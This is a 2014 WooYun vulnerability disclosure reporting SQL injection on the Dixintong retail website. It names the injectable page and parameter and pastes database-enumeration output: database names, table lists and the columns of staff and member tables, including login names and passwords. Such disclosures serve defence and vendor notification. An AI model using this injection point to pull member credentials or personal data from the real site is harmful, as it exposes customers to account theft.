当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067877

漏洞标题:迪信通官网SQL注入

相关厂商:迪信通

漏洞作者: jaffer

提交时间:2014-07-11 12:44

修复时间:2014-10-09 12:46

公开时间:2014-10-09 12:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-10-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百度百家67期(昨天)争鸣说道,迪信通转型成功吗?这不,刚上市,就有这么大一个漏洞。

详细说明:

注入点:

http://www.dixintong.com/activityshow.aspx?aId=660


database:

available databases [9]:
[*] crm
[*] dixintong
[*] master
[*] model
[*] msdb
[*] official
[*] tempdb
[*] wxcrm
[*] xnyycrm


看几张表就知道了

Database: dixintong
[50 tables]
+----------------------------+
| dbo.Account |
| dbo.AccountAddr |
| dbo.AccountBasics |
| dbo.AccountCash |
| dbo.AccountFavor |
| dbo.AccountMess |
| dbo.AccountMessItem |
| dbo.AccountSafe |
| dbo.AccountSubscribe |
| dbo.DictArea1 |
| dbo.DictArea2 |
| dbo.DictArea3 |
| dbo.DictCateX |
| dbo.DictCourse |
| dbo.Product |
| dbo.ProductAssess |
| dbo.ProductAssrep |
| dbo.ProductAttrItem |
| dbo.ProductFlag |
| dbo.ProductImage |
| dbo.ProductMobile |
| dbo.ProductMobileRatio |
| dbo.ProductNote |
| dbo.ProductNoteTemp |
| dbo.ProductPrice |
| dbo.ProductStatus |
| dbo.ProductSuburb |
| dbo.ProductTemp |
| dbo.ProductTempItem |
| dbo.SaleOrder |
| dbo.SaleOrderItem |
| dbo.SaleOrderShare |
| dbo.SaleOrderStatus |
| dbo.Staff |
| dbo.SysChannel |
| dbo.SysMail |
| dbo.SysMailTemp |
| dbo.SysPower |
| dbo.SysRole |
| dbo.SysRolePower |
| dbo.SysStatistics |
| dbo.SysUser |
| dbo.SysUserRole |
| dbo.V_AccountFavor |
| dbo.V_AccountMess |
| dbo.V_PersonlAccountReport |
| dbo.V_Product |
| dbo.V_ProductPrice |
| dbo.V_SaleOrder |
| dbo.V_SaleOrderItemReport |
+----------------------------+


Database: dixintong
Table: dbo.Staff
[7 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| Area | nvarchar |
| Company | nvarchar |
| CreateTime | datetime |
| SoreName | nvarchar |
| StaffCode | nvarchar |
| StaffName | nvarchar |
| SysNo | int |
+------------+----------+


Database: crm
[59 tables]
+----------------------------+
| dbo.AdminNav |
| dbo.Article |
| dbo.ArticleClass |
| dbo.BrandInfo |
| dbo.BugerInfo |
| dbo.Company |
| dbo.CompanyProduct |
| dbo.Dispose |
| dbo.EOrderMem |
| dbo.HistoryCompanyProduct |
| dbo.HistoryProduct |
| dbo.ProCPU |
| dbo.ProColor |
| dbo.ProDB |
| dbo.ProDjms |
| dbo.ProFbl |
| dbo.ProMemory |
| dbo.ProOperator |
| dbo.ProPlatform |
| dbo.ProPmcc |
| dbo.ProPmcz |
| dbo.ProSxtpx |
| dbo.ProSystem |
| dbo.ProTypeInfo |
| dbo.ProWlpl |
| dbo.ProWlzs |
| dbo.ProXsmd |
| dbo.Product |
| dbo.ProductClass |
| dbo.Reservation |
| dbo.Role |
| dbo.SysUser |
| dbo.SystemLog |
| dbo.View_Article |
| dbo.View_CompanyProduct |
| dbo.View_Orders |
| dbo.View_Product |
| dbo.View_QuestionAndAnswer |
| dbo.View_contractProduct |
| dbo.View_mdztorder |
| dbo.View_questionnaire |
| dbo.activity |
| dbo.answer |
| dbo.comtowxgroups |
| dbo.contractProduct |
| dbo.greentravel |
| dbo.mdztorders |
| dbo.member |
| dbo.message |
| dbo.mount |
| dbo.orders |
| dbo.orderstate |
| dbo.question |
| dbo.questionnaire |
| dbo.sqlmapoutput |
| dbo.staffinfo |
| dbo.storeType |
| dbo.storefront |
| dbo.wxhuodong |
+----------------------------+


用户信息table

Database: crm
Table: dbo.member
[22 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| address | varchar |
| addtime | datetime |
| area | varchar |
| city | varchar |
| Email | varchar |
| Id | int |
| integral | int |
| IsOldmem | int |
| isOpen | int |
| lastLogIp | varchar |
| lasttime | datetime |
| loginName | varchar |
| loginPwd | varchar |
| logNum | int |
| memberCode | varchar |
| mlevel | varchar |
| nickname | varchar |
| productPicture | varchar |
| province | varchar |
| QQ | varchar |
| tel | varchar |
| weixin | varchar |
+----------------+----------+


漏洞证明:

看看上面的各种表吧。
所有信息都出来了。
赶快修复吧。建议对网站进行一次渗透测试。

修复方案:

版权声明:转载请注明来源 jaffer@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论